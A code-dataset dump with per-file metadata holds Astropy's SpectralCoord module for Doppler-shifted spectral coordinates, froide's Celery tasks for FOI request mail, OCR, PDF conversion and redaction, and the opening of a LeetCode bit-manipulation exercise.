repr_items.append(f' radial_velocity={radial_velocity}')
repr_items.append(f' redshift={redshift}')
if self.doppler_rest is not None or self.doppler_convention is not None:
repr_items.append(f' doppler_rest={self.doppler_rest}')
repr_items.append(f' doppler_convention={self.doppler_convention}')
arrstr = np.array2string(self.view(np.ndarray), separator=', ',
prefix=' ')
if len(repr_items) == 1:
repr_items[0] += f'{arrstr}{self._unitstr:s}'
else:
repr_items[1] = ' (' + repr_items[1].lstrip()
repr_items[-1] += ')'
repr_items.append(f' {arrstr}{self._unitstr:s}')
return '\n'.join(repr_items) + '>'
| 41.219922 | 111 | 0.638107 | import warnings
from textwrap import indent
import astropy.units as u
import numpy as np
from astropy.constants import c
from astropy.coordinates import (ICRS,
CartesianDifferential,
CartesianRepresentation, SkyCoord)
from astropy.coordinates.spectral_quantity import SpectralQuantity
from astropy.coordinates.baseframe import (BaseCoordinateFrame,
frame_transform_graph)
from astropy.utils.exceptions import AstropyUserWarning
__all__ = ['SpectralCoord']
class NoVelocityWarning(AstropyUserWarning):
pass
class NoDistanceWarning(AstropyUserWarning):
pass
KMS = u.km / u.s
C_KMS = c.to(KMS)
ZERO_VELOCITIES = CartesianDifferential([0, 0, 0] * KMS)
DEFAULT_DISTANCE = 1e6 * u.kpc
__doctest_skip__ = ['SpectralCoord.*']
def _velocity_to_redshift(velocity):
beta = velocity / C_KMS
return np.sqrt((1 + beta) / (1 - beta)) - 1
def _redshift_to_velocity(redshift):
zponesq = (1 + redshift) ** 2
return (C_KMS * (zponesq - 1) / (zponesq + 1))
def _apply_relativistic_doppler_shift(scoord, velocity):
# NOTE: we deliberately don't keep sub-classes of SpectralQuantity intact
squantity = scoord.view(SpectralQuantity)
beta = velocity / c
doppler_factor = np.sqrt((1 + beta) / (1 - beta))
if squantity.unit.is_equivalent(u.m): # wavelength
return squantity * doppler_factor
elif (squantity.unit.is_equivalent(u.Hz) or
squantity.unit.is_equivalent(u.eV) or
squantity.unit.is_equivalent(1 / u.m)):
return squantity / doppler_factor
elif squantity.unit.is_equivalent(KMS): # velocity
return (squantity.to(u.Hz) / doppler_factor).to(squantity.unit)
else: # pragma: no cover
raise RuntimeError(f"Unexpected units in velocity shift: {squantity.unit}. "
"This should not happen, so please report this in the "
"astropy issue tracker!")
def update_differentials_to_match(original, velocity_reference, preserve_observer_frame=False):
if not velocity_reference.data.differentials:
raise ValueError("Reference frame has no velocities")
# If the reference has an obstime already defined, we should ignore
# it and stick with the original observer obstime.
if 'obstime' in velocity_reference.frame_attributes and hasattr(original, 'obstime'):
velocity_reference = velocity_reference.replicate(obstime=original.obstime)
# We transform both coordinates to ICRS for simplicity and because we know
# it's a simple frame that is not time-dependent (it could be that both
original_icrs = original.transform_to(ICRS())
velocity_reference_icrs = velocity_reference.transform_to(ICRS())
differentials = velocity_reference_icrs.data.represent_as(CartesianRepresentation,
CartesianDifferential).differentials
data_with_differentials = (original_icrs.data.represent_as(CartesianRepresentation)
.with_differentials(differentials))
final_icrs = original_icrs.realize_frame(data_with_differentials)
if preserve_observer_frame:
final = final_icrs.transform_to(original)
else:
final = final_icrs.transform_to(velocity_reference)
return final.replicate(representation_type=CartesianRepresentation,
differential_type=CartesianDifferential)
def attach_zero_velocities(coord):
new_data = coord.cartesian.with_differentials(ZERO_VELOCITIES)
return coord.realize_frame(new_data)
def _get_velocities(coord):
if 's' in coord.data.differentials:
return coord.velocity
else:
return ZERO_VELOCITIES
class SpectralCoord(SpectralQuantity):
@u.quantity_input(radial_velocity=u.km/u.s)
def __new__(cls, value, unit=None,
observer=None, target=None,
radial_velocity=None, redshift=None,
**kwargs):
obj = super().__new__(cls, value, unit=unit, **kwargs)
# or redshift.
if target is not None and observer is not None:
if radial_velocity is not None or redshift is not None:
raise ValueError("Cannot specify radial velocity or redshift if both "
"target and observer are specified")
# We only deal with redshifts here and in the redshift property.
# Otherwise internally we always deal with velocities.
if redshift is not None:
if radial_velocity is not None:
raise ValueError("Cannot set both a radial velocity and redshift")
redshift = u.Quantity(redshift)
# For now, we can't specify redshift=u.one in quantity_input above
if not redshift.unit.is_equivalent(u.one):
raise u.UnitsError('redshift should be dimensionless')
radial_velocity = _redshift_to_velocity(redshift)
# parameters that aren't being overridden
if observer is None:
observer = getattr(value, 'observer', None)
if target is None:
target = getattr(value, 'target', None)
if observer is None or target is None:
if radial_velocity is None:
radial_velocity = getattr(value, 'radial_velocity', None)
obj._radial_velocity = radial_velocity
obj._observer = cls._validate_coordinate(observer, label='observer')
obj._target = cls._validate_coordinate(target, label='target')
return obj
def __array_finalize__(self, obj):
super().__array_finalize__(obj)
self._radial_velocity = getattr(obj, '_radial_velocity', None)
self._observer = getattr(obj, '_observer', None)
self._target = getattr(obj, '_target', None)
@staticmethod
def _validate_coordinate(coord, label=''):
if coord is None:
return
if not issubclass(coord.__class__, BaseCoordinateFrame):
if isinstance(coord, SkyCoord):
coord = coord.frame
else:
raise TypeError(f"{label} must be a SkyCoord or coordinate frame instance")
# https://github.com/astropy/astropy/issues/10247
with np.errstate(all='ignore'):
distance = getattr(coord, 'distance', None)
if distance is not None and distance.unit.physical_type == 'dimensionless':
coord = SkyCoord(coord, distance=DEFAULT_DISTANCE)
warnings.warn(
"Distance on coordinate object is dimensionless, an "
f"abritrary distance value of {DEFAULT_DISTANCE} will be set instead.",
NoDistanceWarning)
# If the observer frame does not contain information about the
# velocity of the system, assume that the velocity is zero in the
# system.
if 's' not in coord.data.differentials:
warnings.warn(
"No velocity defined on frame, assuming {}.".format(
ZERO_VELOCITIES),
NoVelocityWarning)
coord = attach_zero_velocities(coord)
return coord
def replicate(self, value=None, unit=None,
observer=None, target=None,
radial_velocity=None, redshift=None,
doppler_convention=None, doppler_rest=None,
copy=False):
if isinstance(value, u.Quantity):
if unit is not None:
raise ValueError("Cannot specify value as a Quantity and also specify unit")
else:
value, unit = value.value, value.unit
value = value if value is not None else self.value
unit = unit or self.unit
observer = self._validate_coordinate(observer) or self.observer
target = self._validate_coordinate(target) or self.target
doppler_convention = doppler_convention or self.doppler_convention
doppler_rest = doppler_rest or self.doppler_rest
# If value is being taken from self and copy is Tru
if copy:
value = value.copy()
# Only include radial_velocity if it is not auto-computed from the
# observer and target.
if (self.observer is None or self.target is None) and radial_velocity is None and redshift is None:
radial_velocity = self.radial_velocity
with warnings.catch_warnings():
warnings.simplefilter('ignore', NoVelocityWarning)
return self.__class__(value=value, unit=unit,
observer=observer, target=target,
radial_velocity=radial_velocity, redshift=redshift,
doppler_convention=doppler_convention, doppler_rest=doppler_rest, copy=False)
@property
def quantity(self):
return self.view(u.Quantity)
@property
def observer(self):
return self._observer
@observer.setter
def observer(self, value):
if self.observer is not None:
raise ValueError("observer has already been set")
self._observer = self._validate_coordinate(value, label='observer')
# Switch to auto-computing radial velocity
if self._target is not None:
self._radial_velocity = None
@property
def target(self):
return self._target
@target.setter
def target(self, value):
if self.target is not None:
raise ValueError("target has already been set")
self._target = self._validate_coordinate(value, label='target')
# Switch to auto-computing radial velocity
if self._observer is not None:
self._radial_velocity = None
@property
def radial_velocity(self):
if self._observer is None or self._target is None:
if self._radial_velocity is None:
return 0 * KMS
else:
return self._radial_velocity
else:
return self._calculate_radial_velocity(self._observer, self._target,
as_scalar=True)
@property
def redshift(self):
return _velocity_to_redshift(self.radial_velocity)
@staticmethod
def _calculate_radial_velocity(observer, target, as_scalar=False):
# Convert observer and target to ICRS to avoid finite differencing
# calculations that lack numerical precision.
observer_icrs = observer.transform_to(ICRS())
target_icrs = target.transform_to(ICRS())
pos_hat = SpectralCoord._normalized_position_vector(observer_icrs, target_icrs)
d_vel = target_icrs.velocity - observer_icrs.velocity
vel_mag = pos_hat.dot(d_vel)
if as_scalar:
return vel_mag
else:
return vel_mag * pos_hat
@staticmethod
def _normalized_position_vector(observer, target):
d_pos = (target.cartesian.without_differentials() -
observer.cartesian.without_differentials())
dp_norm = d_pos.norm()
# Reset any that are 0 to 1 to avoid nans from 0/0
dp_norm[dp_norm == 0] = 1 * dp_norm.unit
pos_hat = d_pos / dp_norm
return pos_hat
@u.quantity_input(velocity=u.km/u.s)
def with_observer_stationary_relative_to(self, frame, velocity=None, preserve_observer_frame=False):
if self.observer is None or self.target is None:
raise ValueError("This method can only be used if both observer "
"and target are defined on the SpectralCoord.")
# Start off by extracting frame if a SkyCoord was passed in
if isinstance(frame, SkyCoord):
frame = frame.frame
if isinstance(frame, BaseCoordinateFrame):
if not frame.has_data:
frame = frame.realize_frame(CartesianRepresentation(0 * u.km, 0 * u.km, 0 * u.km))
if frame.data.differentials:
if velocity is not None:
raise ValueError('frame already has differentials, cannot also specify velocity')
# otherwise frame is ready to go
else:
if velocity is None:
differentials = ZERO_VELOCITIES
else:
differentials = CartesianDifferential(velocity)
frame = frame.realize_frame(frame.data.with_differentials(differentials))
if isinstance(frame, (type, str)):
if isinstance(frame, type):
frame_cls = frame
elif isinstance(frame, str):
frame_cls = frame_transform_graph.lookup_name(frame)
if velocity is None:
velocity = 0 * u.m / u.s, 0 * u.m / u.s, 0 * u.m / u.s
elif velocity.shape != (3,):
raise ValueError('velocity should be a Quantity vector with 3 elements')
frame = frame_cls(0 * u.m, 0 * u.m, 0 * u.m,
*velocity,
representation_type='cartesian',
differential_type='cartesian')
observer = update_differentials_to_match(self.observer, frame,
preserve_observer_frame=preserve_observer_frame)
# Calculate the initial and final los velocity
init_obs_vel = self._calculate_radial_velocity(self.observer, self.target, as_scalar=True)
fin_obs_vel = self._calculate_radial_velocity(observer, self.target, as_scalar=True)
# Apply transformation to data
new_data = _apply_relativistic_doppler_shift(self, fin_obs_vel - init_obs_vel)
new_coord = self.replicate(value=new_data, observer=observer)
return new_coord
def with_radial_velocity_shift(self, target_shift=None, observer_shift=None):
if observer_shift is not None and (self.target is None or
self.observer is None):
raise ValueError("Both an observer and target must be defined "
"before applying a velocity shift.")
for arg in [x for x in [target_shift, observer_shift] if x is not None]:
if isinstance(arg, u.Quantity) and not arg.unit.is_equivalent((u.one, KMS)):
raise u.UnitsError("Argument must have unit physical type "
"'speed' for radial velocty or "
"'dimensionless' for redshift.")
# The target or observer value is defined but is not a quantity object,
# assume it's a redshift float value and convert to velocity
if target_shift is None:
if self._observer is None or self._target is None:
return self.replicate()
target_shift = 0 * KMS
else:
target_shift = u.Quantity(target_shift)
if target_shift.unit.physical_type == 'dimensionless':
target_shift = _redshift_to_velocity(target_shift)
if self._observer is None or self._target is None:
return self.replicate(value=_apply_relativistic_doppler_shift(self, target_shift),
radial_velocity=self.radial_velocity + target_shift)
if observer_shift is None:
observer_shift = 0 * KMS
else:
observer_shift = u.Quantity(observer_shift)
if observer_shift.unit.physical_type == 'dimensionless':
observer_shift = _redshift_to_velocity(observer_shift)
target_icrs = self._target.transform_to(ICRS())
observer_icrs = self._observer.transform_to(ICRS())
pos_hat = SpectralCoord._normalized_position_vector(observer_icrs, target_icrs)
target_velocity = _get_velocities(target_icrs) + target_shift * pos_hat
observer_velocity = _get_velocities(observer_icrs) + observer_shift * pos_hat
target_velocity = CartesianDifferential(target_velocity.xyz)
observer_velocity = CartesianDifferential(observer_velocity.xyz)
new_target = (target_icrs
.realize_frame(target_icrs.cartesian.with_differentials(target_velocity))
.transform_to(self._target))
new_observer = (observer_icrs
.realize_frame(observer_icrs.cartesian.with_differentials(observer_velocity))
.transform_to(self._observer))
init_obs_vel = self._calculate_radial_velocity(observer_icrs, target_icrs, as_scalar=True)
fin_obs_vel = self._calculate_radial_velocity(new_observer, new_target, as_scalar=True)
new_data = _apply_relativistic_doppler_shift(self, fin_obs_vel - init_obs_vel)
return self.replicate(value=new_data,
observer=new_observer,
target=new_target)
def to_rest(self):
if self.observer is not None and self.target is not None:
return self.with_observer_stationary_relative_to(self.target)
result = _apply_relativistic_doppler_shift(self, -self.radial_velocity)
return self.replicate(value=result, radial_velocity=0. * KMS, redshift=None)
def __repr__(self):
prefixstr = '<' + self.__class__.__name__ + ' '
try:
radial_velocity = self.radial_velocity
redshift = self.redshift
except ValueError:
radial_velocity = redshift = 'Undefined'
repr_items = [f'{prefixstr}']
if self.observer is not None:
observer_repr = indent(repr(self.observer), 14 * ' ').lstrip()
repr_items.append(f' observer: {observer_repr}')
if self.target is not None:
target_repr = indent(repr(self.target), 12 * ' ').lstrip()
repr_items.append(f' target: {target_repr}')
if (self._observer is not None and self._target is not None) or self._radial_velocity is not None:
if self.observer is not None and self.target is not None:
repr_items.append(' observer to target (computed from above):')
else:
repr_items.append(' observer to target:')
repr_items.append(f' radial_velocity={radial_velocity}')
repr_items.append(f' redshift={redshift}')
if self.doppler_rest is not None or self.doppler_convention is not None:
repr_items.append(f' doppler_rest={self.doppler_rest}')
repr_items.append(f' doppler_convention={self.doppler_convention}')
arrstr = np.array2string(self.view(np.ndarray), separator=', ',
prefix=' ')
if len(repr_items) == 1:
repr_items[0] += f'{arrstr}{self._unitstr:s}'
else:
repr_items[1] = ' (' + repr_items[1].lstrip()
repr_items[-1] += ')'
repr_items.append(f' {arrstr}{self._unitstr:s}')
return '\n'.join(repr_items) + '>'
| true | true |
7900fd9108cca2e41cb7dd605cf195436c3aef24 | 10,134 | py | Python | froide/foirequest/tasks.py | MrKrisKrisu/froide | d4ae1daeab617bcb1b60630c437f6d5c2bfe3a70 | [
"MIT"
] | null | null | null | froide/foirequest/tasks.py | MrKrisKrisu/froide | d4ae1daeab617bcb1b60630c437f6d5c2bfe3a70 | [
"MIT"
] | null | null | null | froide/foirequest/tasks.py | MrKrisKrisu/froide | d4ae1daeab617bcb1b60630c437f6d5c2bfe3a70 | [
"MIT"
] | null | null | null | import os
import logging
from django.conf import settings
from django.utils import translation
from django.utils.translation import gettext_lazy as _
from django.db import transaction
from django.core.files.base import ContentFile
from celery.exceptions import SoftTimeLimitExceeded
from froide.celery import app as celery_app
from froide.publicbody.models import PublicBody
from froide.upload.models import Upload
from .models import FoiRequest, FoiMessage, FoiAttachment, FoiProject
from .foi_mail import _process_mail, _fetch_mail
from .notifications import send_classification_reminder
logger = logging.getLogger(__name__)
@celery_app.task(
name="froide.foirequest.tasks.process_mail", acks_late=True, time_limit=60
)
def process_mail(*args, **kwargs):
translation.activate(settings.LANGUAGE_CODE)
with transaction.atomic():
_process_mail(*args, **kwargs)
@celery_app.task(name="froide.foirequest.tasks.fetch_mail", expires=60)
def fetch_mail():
for mail_uid, rfc_data in _fetch_mail():
process_mail.delay(rfc_data, mail_uid=mail_uid)
@celery_app.task
def detect_overdue():
translation.activate(settings.LANGUAGE_CODE)
for foirequest in FoiRequest.objects.get_to_be_overdue():
foirequest.set_overdue()
@celery_app.task
def detect_asleep():
translation.activate(settings.LANGUAGE_CODE)
for foirequest in FoiRequest.objects.get_to_be_asleep():
foirequest.set_asleep()
@celery_app.task
def classification_reminder():
translation.activate(settings.LANGUAGE_CODE)
for foirequest in FoiRequest.objects.get_unclassified():
send_classification_reminder(foirequest)
@celery_app.task
def check_delivery_status(message_id, count=None, extended=False):
try:
message = FoiMessage.objects.get(id=message_id)
except FoiMessage.DoesNotExist:
return
message.check_delivery_status(count=count, extended=extended)
@celery_app.task
def create_project_requests(project_id, publicbody_ids, **kwargs):
for seq, pb_id in enumerate(publicbody_ids):
create_project_request.delay(project_id, pb_id, sequence=seq, **kwargs)
@celery_app.task
def create_project_request(project_id, publicbody_id, sequence=0, **kwargs):
from .services import CreateRequestFromProjectService
try:
project = FoiProject.objects.get(id=project_id)
except FoiProject.DoesNotExist:
# project does not exist anymore?
return
try:
pb = PublicBody.objects.get(id=publicbody_id)
except PublicBody.DoesNotExist:
# pb was deleted?
return
kwargs.update(
{
"project": project,
"publicbody": pb,
"subject": project.title,
"user": project.user,
"body": project.description,
"public": project.public,
"reference": project.reference,
"tags": [t.name for t in project.tags.all()],
"project_order": sequence,
}
)
service = CreateRequestFromProjectService(kwargs)
foirequest = service.execute()
if project.request_count == project.foirequest_set.all().count():
project.status = FoiProject.STATUS_READY
project.save()
return foirequest.pk
@celery_app.task(name="froide.foirequest.tasks.convert_attachment_task", time_limit=60)
def convert_attachment_task(instance_id):
try:
att = FoiAttachment.objects.get(pk=instance_id)
except FoiAttachment.DoesNotExist:
return
if att.can_convert_to_pdf():
return convert_attachment(att)
def ocr_pdf_attachment(att):
if att.converted:
ocred_att = att.converted
else:
name, ext = os.path.splitext(att.name)
name = _("{name}_ocr{ext}").format(name=name, ext=".pdf")
ocred_att = FoiAttachment.objects.create(
name=name,
belongs_to=att.belongs_to,
approved=False,
filetype="application/pdf",
is_converted=True,
can_approve=att.can_approve,
)
att.converted = ocred_att
att.can_approve = False
att.approved = False
att.save()
ocr_pdf_task.delay(
att.pk,
ocred_att.pk,
)
def convert_attachment(att):
from filingcabinet.pdf_utils import convert_to_pdf
output_bytes = convert_to_pdf(
att.file.path,
binary_name=settings.FROIDE_CONFIG.get("doc_conversion_binary"),
construct_call=settings.FROIDE_CONFIG.get("doc_conversion_call_func"),
)
if output_bytes is None:
return
if att.converted:
new_att = att.converted
else:
name, ext = os.path.splitext(att.name)
name = _("{name}_converted{ext}").format(name=name, ext=".pdf")
new_att = FoiAttachment(
name=name,
belongs_to=att.belongs_to,
approved=False,
filetype="application/pdf",
is_converted=True,
can_approve=att.can_approve,
)
new_file = ContentFile(output_bytes)
new_att.size = new_file.size
new_att.file.save(new_att.name, new_file)
new_att.save()
att.converted = new_att
att.can_approve = False
att.approved = False
att.save()
@celery_app.task(
name="froide.foirequest.tasks.convert_images_to_pdf_task",
time_limit=60 * 5,
soft_time_limit=60 * 4,
)
def convert_images_to_pdf_task(att_ids, target_id, instructions, can_approve=True):
from filingcabinet.pdf_utils import convert_images_to_ocred_pdf
att_qs = FoiAttachment.objects.filter(id__in=att_ids)
att_map = {a.id: a for a in att_qs}
atts = [att_map[a_id] for a_id in att_ids]
try:
target = FoiAttachment.objects.get(id=target_id)
except FoiAttachment.DoesNotExist:
return
paths = [a.file.path for a in atts]
try:
pdf_bytes = convert_images_to_ocred_pdf(paths, instructions=instructions)
except SoftTimeLimitExceeded:
pdf_bytes = None
if pdf_bytes is None:
att_qs.update(can_approve=can_approve)
target.delete()
return
new_file = ContentFile(pdf_bytes)
target.size = new_file.size
target.file.save(target.name, new_file)
target.save()
@celery_app.task(
name="froide.foirequest.tasks.ocr_pdf_task",
time_limit=60 * 5,
soft_time_limit=60 * 4,
)
def ocr_pdf_task(att_id, target_id, can_approve=True):
from filingcabinet.pdf_utils import run_ocr
try:
attachment = FoiAttachment.objects.get(pk=att_id)
except FoiAttachment.DoesNotExist:
return
try:
target = FoiAttachment.objects.get(pk=target_id)
except FoiAttachment.DoesNotExist:
return
try:
pdf_bytes = run_ocr(
attachment.file.path,
language=settings.TESSERACT_LANGUAGE
if settings.TESSERACT_LANGUAGE
else settings.LANGUAGE_CODE,
timeout=180,
)
except SoftTimeLimitExceeded:
pdf_bytes = None
if pdf_bytes is None:
attachment.can_approve = can_approve
attachment.save()
target.delete()
return
new_file = ContentFile(pdf_bytes)
target.size = new_file.size
target.file.save(target.name, new_file)
target.save()
@celery_app.task(
name="froide.foirequest.tasks.redact_attachment_task",
time_limit=60 * 6,
soft_time_limit=60 * 5,
)
def redact_attachment_task(att_id, target_id, instructions):
from filingcabinet.pdf_utils import run_ocr
from froide.helper.redaction import redact_file
try:
attachment = FoiAttachment.objects.get(pk=att_id)
except FoiAttachment.DoesNotExist:
return
if att_id != target_id:
try:
target = FoiAttachment.objects.get(pk=target_id)
except FoiAttachment.DoesNotExist:
return
else:
target = attachment
logger.info("Trying redaction of %s", attachment.id)
try:
pdf_bytes = redact_file(attachment.file, instructions)
except Exception:
logger.error("PDF redaction error", exc_info=True)
pdf_bytes = None
if pdf_bytes is None:
logger.info("Redaction failed %s", attachment.id)
# Redaction has failed, remove empty attachment
if attachment.redacted:
attachment.redacted = None
if attachment.is_redacted:
attachment.approved = True
attachment.can_approve = True
attachment.pending = False
attachment.save()
if not target.file:
target.delete()
return
logger.info("Redaction successful %s", attachment.id)
pdf_file = ContentFile(pdf_bytes)
target.size = pdf_file.size
target.file.save(target.name, pdf_file, save=False)
logger.info("Trying OCR %s", target.id)
try:
pdf_bytes = run_ocr(
target.file.path,
language=settings.TESSERACT_LANGUAGE
if settings.TESSERACT_LANGUAGE
else settings.LANGUAGE_CODE,
timeout=60 * 4,
)
except SoftTimeLimitExceeded:
pdf_bytes = None
if pdf_bytes is not None:
logger.info("OCR successful %s", target.id)
pdf_file = ContentFile(pdf_bytes)
target.size = pdf_file.size
target.file.save(target.name, pdf_file, save=False)
else:
logger.info("OCR failed %s", target.id)
target.can_approve = True
target.pending = False
target.approve_and_save()
FoiAttachment.attachment_published.send(sender=target, user=None)
@celery_app.task(name="froide.foirequest.tasks.move_upload_to_attachment")
def move_upload_to_attachment(att_id, upload_id):
try:
att = FoiAttachment.objects.get(pk=att_id)
except FoiAttachment.DoesNotExist:
return
try:
upload = Upload.objects.get(pk=upload_id)
except FoiAttachment.DoesNotExist:
return
file = upload.get_file()
if file:
att.pending = False
att.file.save(att.name, file, save=True)
upload.finish()
upload.delete()
if att.can_convert_to_pdf():
convert_attachment_task.delay(att.id)
| 28.307263 | 87 | 0.677719 | import os
import logging
from django.conf import settings
from django.utils import translation
from django.utils.translation import gettext_lazy as _
from django.db import transaction
from django.core.files.base import ContentFile
from celery.exceptions import SoftTimeLimitExceeded
from froide.celery import app as celery_app
from froide.publicbody.models import PublicBody
from froide.upload.models import Upload
from .models import FoiRequest, FoiMessage, FoiAttachment, FoiProject
from .foi_mail import _process_mail, _fetch_mail
from .notifications import send_classification_reminder
logger = logging.getLogger(__name__)
@celery_app.task(
name="froide.foirequest.tasks.process_mail", acks_late=True, time_limit=60
)
def process_mail(*args, **kwargs):
translation.activate(settings.LANGUAGE_CODE)
with transaction.atomic():
_process_mail(*args, **kwargs)
@celery_app.task(name="froide.foirequest.tasks.fetch_mail", expires=60)
def fetch_mail():
for mail_uid, rfc_data in _fetch_mail():
process_mail.delay(rfc_data, mail_uid=mail_uid)
@celery_app.task
def detect_overdue():
translation.activate(settings.LANGUAGE_CODE)
for foirequest in FoiRequest.objects.get_to_be_overdue():
foirequest.set_overdue()
@celery_app.task
def detect_asleep():
translation.activate(settings.LANGUAGE_CODE)
for foirequest in FoiRequest.objects.get_to_be_asleep():
foirequest.set_asleep()
@celery_app.task
def classification_reminder():
translation.activate(settings.LANGUAGE_CODE)
for foirequest in FoiRequest.objects.get_unclassified():
send_classification_reminder(foirequest)
@celery_app.task
def check_delivery_status(message_id, count=None, extended=False):
try:
message = FoiMessage.objects.get(id=message_id)
except FoiMessage.DoesNotExist:
return
message.check_delivery_status(count=count, extended=extended)
@celery_app.task
def create_project_requests(project_id, publicbody_ids, **kwargs):
for seq, pb_id in enumerate(publicbody_ids):
create_project_request.delay(project_id, pb_id, sequence=seq, **kwargs)
@celery_app.task
def create_project_request(project_id, publicbody_id, sequence=0, **kwargs):
from .services import CreateRequestFromProjectService
try:
project = FoiProject.objects.get(id=project_id)
except FoiProject.DoesNotExist:
return
try:
pb = PublicBody.objects.get(id=publicbody_id)
except PublicBody.DoesNotExist:
return
kwargs.update(
{
"project": project,
"publicbody": pb,
"subject": project.title,
"user": project.user,
"body": project.description,
"public": project.public,
"reference": project.reference,
"tags": [t.name for t in project.tags.all()],
"project_order": sequence,
}
)
service = CreateRequestFromProjectService(kwargs)
foirequest = service.execute()
if project.request_count == project.foirequest_set.all().count():
project.status = FoiProject.STATUS_READY
project.save()
return foirequest.pk
@celery_app.task(name="froide.foirequest.tasks.convert_attachment_task", time_limit=60)
def convert_attachment_task(instance_id):
try:
att = FoiAttachment.objects.get(pk=instance_id)
except FoiAttachment.DoesNotExist:
return
if att.can_convert_to_pdf():
return convert_attachment(att)
def ocr_pdf_attachment(att):
if att.converted:
ocred_att = att.converted
else:
name, ext = os.path.splitext(att.name)
name = _("{name}_ocr{ext}").format(name=name, ext=".pdf")
ocred_att = FoiAttachment.objects.create(
name=name,
belongs_to=att.belongs_to,
approved=False,
filetype="application/pdf",
is_converted=True,
can_approve=att.can_approve,
)
att.converted = ocred_att
att.can_approve = False
att.approved = False
att.save()
ocr_pdf_task.delay(
att.pk,
ocred_att.pk,
)
def convert_attachment(att):
from filingcabinet.pdf_utils import convert_to_pdf
output_bytes = convert_to_pdf(
att.file.path,
binary_name=settings.FROIDE_CONFIG.get("doc_conversion_binary"),
construct_call=settings.FROIDE_CONFIG.get("doc_conversion_call_func"),
)
if output_bytes is None:
return
if att.converted:
new_att = att.converted
else:
name, ext = os.path.splitext(att.name)
name = _("{name}_converted{ext}").format(name=name, ext=".pdf")
new_att = FoiAttachment(
name=name,
belongs_to=att.belongs_to,
approved=False,
filetype="application/pdf",
is_converted=True,
can_approve=att.can_approve,
)
new_file = ContentFile(output_bytes)
new_att.size = new_file.size
new_att.file.save(new_att.name, new_file)
new_att.save()
att.converted = new_att
att.can_approve = False
att.approved = False
att.save()
@celery_app.task(
name="froide.foirequest.tasks.convert_images_to_pdf_task",
time_limit=60 * 5,
soft_time_limit=60 * 4,
)
def convert_images_to_pdf_task(att_ids, target_id, instructions, can_approve=True):
from filingcabinet.pdf_utils import convert_images_to_ocred_pdf
att_qs = FoiAttachment.objects.filter(id__in=att_ids)
att_map = {a.id: a for a in att_qs}
atts = [att_map[a_id] for a_id in att_ids]
try:
target = FoiAttachment.objects.get(id=target_id)
except FoiAttachment.DoesNotExist:
return
paths = [a.file.path for a in atts]
try:
pdf_bytes = convert_images_to_ocred_pdf(paths, instructions=instructions)
except SoftTimeLimitExceeded:
pdf_bytes = None
if pdf_bytes is None:
att_qs.update(can_approve=can_approve)
target.delete()
return
new_file = ContentFile(pdf_bytes)
target.size = new_file.size
target.file.save(target.name, new_file)
target.save()
@celery_app.task(
name="froide.foirequest.tasks.ocr_pdf_task",
time_limit=60 * 5,
soft_time_limit=60 * 4,
)
def ocr_pdf_task(att_id, target_id, can_approve=True):
from filingcabinet.pdf_utils import run_ocr
try:
attachment = FoiAttachment.objects.get(pk=att_id)
except FoiAttachment.DoesNotExist:
return
try:
target = FoiAttachment.objects.get(pk=target_id)
except FoiAttachment.DoesNotExist:
return
try:
pdf_bytes = run_ocr(
attachment.file.path,
language=settings.TESSERACT_LANGUAGE
if settings.TESSERACT_LANGUAGE
else settings.LANGUAGE_CODE,
timeout=180,
)
except SoftTimeLimitExceeded:
pdf_bytes = None
if pdf_bytes is None:
attachment.can_approve = can_approve
attachment.save()
target.delete()
return
new_file = ContentFile(pdf_bytes)
target.size = new_file.size
target.file.save(target.name, new_file)
target.save()
@celery_app.task(
name="froide.foirequest.tasks.redact_attachment_task",
time_limit=60 * 6,
soft_time_limit=60 * 5,
)
def redact_attachment_task(att_id, target_id, instructions):
from filingcabinet.pdf_utils import run_ocr
from froide.helper.redaction import redact_file
try:
attachment = FoiAttachment.objects.get(pk=att_id)
except FoiAttachment.DoesNotExist:
return
if att_id != target_id:
try:
target = FoiAttachment.objects.get(pk=target_id)
except FoiAttachment.DoesNotExist:
return
else:
target = attachment
logger.info("Trying redaction of %s", attachment.id)
try:
pdf_bytes = redact_file(attachment.file, instructions)
except Exception:
logger.error("PDF redaction error", exc_info=True)
pdf_bytes = None
if pdf_bytes is None:
logger.info("Redaction failed %s", attachment.id)
if attachment.redacted:
attachment.redacted = None
if attachment.is_redacted:
attachment.approved = True
attachment.can_approve = True
attachment.pending = False
attachment.save()
if not target.file:
target.delete()
return
logger.info("Redaction successful %s", attachment.id)
pdf_file = ContentFile(pdf_bytes)
target.size = pdf_file.size
target.file.save(target.name, pdf_file, save=False)
logger.info("Trying OCR %s", target.id)
try:
pdf_bytes = run_ocr(
target.file.path,
language=settings.TESSERACT_LANGUAGE
if settings.TESSERACT_LANGUAGE
else settings.LANGUAGE_CODE,
timeout=60 * 4,
)
except SoftTimeLimitExceeded:
pdf_bytes = None
if pdf_bytes is not None:
logger.info("OCR successful %s", target.id)
pdf_file = ContentFile(pdf_bytes)
target.size = pdf_file.size
target.file.save(target.name, pdf_file, save=False)
else:
logger.info("OCR failed %s", target.id)
target.can_approve = True
target.pending = False
target.approve_and_save()
FoiAttachment.attachment_published.send(sender=target, user=None)
@celery_app.task(name="froide.foirequest.tasks.move_upload_to_attachment")
def move_upload_to_attachment(att_id, upload_id):
try:
att = FoiAttachment.objects.get(pk=att_id)
except FoiAttachment.DoesNotExist:
return
try:
upload = Upload.objects.get(pk=upload_id)
except FoiAttachment.DoesNotExist:
return
file = upload.get_file()
if file:
att.pending = False
att.file.save(att.name, file, save=True)
upload.finish()
upload.delete()
if att.can_convert_to_pdf():
convert_attachment_task.delay(att.id)
| true | true |
7900fda1d54a3129f2b7595b084a6fd4e7ad0f06 | 1,092 | py | Python | LeetCode/318 Maximum Product of Word Lengths.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | LeetCode/318 Maximum Product of Word Lengths.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | LeetCode/318 Maximum Product of Word Lengths.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | # Bit Manipulation
# Given a string array words, find the maximum value of length(word[i]) * length(word[j]) where the two words do not share common letters. You may assume that each word will contain only lower case letters. If no such two words exist, return 0.
#
# Example 1:
#
# Input: ["abcw","baz","foo","bar","xtfn","abcdef"]
# Output: 16
# Explanation: The two words can be "abcw", "xtfn".
# Example 2:
#
# Input: ["a","ab","abc","d","cd","bcd","abcd"]
# Output: 4
# Explanation: The two words can be "ab", "cd".
# Example 3:
#
# Input: ["a","aa","aaa","aaaa"]
# Output: 0
# Explanation: No such pair of words.
class Solution:
